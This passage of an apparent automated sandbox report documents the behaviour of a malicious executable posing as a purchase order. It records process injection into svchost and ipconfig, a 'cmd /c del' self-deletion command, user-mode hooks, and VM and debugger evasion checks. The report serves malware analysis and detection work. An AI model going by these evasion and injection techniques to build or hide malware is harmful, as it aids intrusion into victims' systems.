          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
          Source: Purchase order MIPO2425110032.exeStatic file information: File size 1312891 > 1048576
          Source: Binary string: ipconfig.pdb source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: Purchase order MIPO2425110032.exeStatic PE information: real checksum: 0xa961f should be: 0x14cb0b
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041285C push cs; retf 2_2_0041285F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417008 pushfd ; retf 2_2_0041700F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171EF push ds; iretd 2_2_004171FD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E992 push dword ptr [08CCB4BEh]; ret 2_2_0041E9AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E9B2 push dword ptr [0ECCDC24h]; ret 2_2_0041EACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416A81 pushfd ; retf 2_2_00416A82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417ABC push edi; ret 2_2_00417ABD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E46D push ebx; retf 2_2_0040E470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E530 push edi; ret 2_2_0041E532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177BF push B417C20Bh; ret 2_2_004177C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBEB1E push esp; retn 0000h2_2_03DBEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBEB02 push esp; retn 0000h2_2_03DBEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE9B5 push esp; retn 0000h2_2_03DBEAE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568E9B5 push esp; retn 0000h2_2_0568EAE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568EB02 push esp; retn 0000h2_2_0568EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568EB1E push esp; retn 0000h2_2_0568EB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15FB1E push esp; retn 0000h3_2_0F15FB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15FB02 push esp; retn 0000h3_2_0F15FB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15F9B5 push esp; retn 0000h3_2_0F15FAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_1038AB1E push esp; retn 0000h3_2_1038AB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_1038AB02 push esp; retn 0000h3_2_1038AB03
          Source: C:\Windows\explorer.exeCode function: 3_2_1038A9B5 push esp; retn 0000h3_2_1038AAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_1086C9B5 push esp; retn 0000h3_2_1086CAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_1086CB02 push esp; retn 0000h3_2_1086CB03
          Source: C:\Windows\explorer.exeCode function: 3_2_1086CB1E push esp; retn 0000h3_2_1086CB1F

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Reads the DNS cache
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB3872 DnsGetCacheDataTableEx,DnsFree,DnsFree,5_2_00CB3872
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI/Special instruction interceptor: Address: 3FA328C
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 2FB9904 second address: 2FB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 2FB9B6E second address: 2FB9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2834Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7115Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9836Jump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87553
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.5 %
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5744Thread sleep count: 2834 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -5668000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5744Thread sleep count: 7115 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -14230000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep count: 135 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep time: -270000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep count: 9836 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep time: -19672000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: Purchase order MIPO2425110032.exe, 00000000.00000002.2047922412.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3289689202.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI call chain: ExitProcess graph end nodegraph_0-86677
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA3558 mov eax, dword ptr fs:[00000030h]0_2_03FA3558
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA34F8 mov eax, dword ptr fs:[00000030h]0_2_03FA34F8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA1EB8 mov eax, dword ptr fs:[00000030h]0_2_03FA1EB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
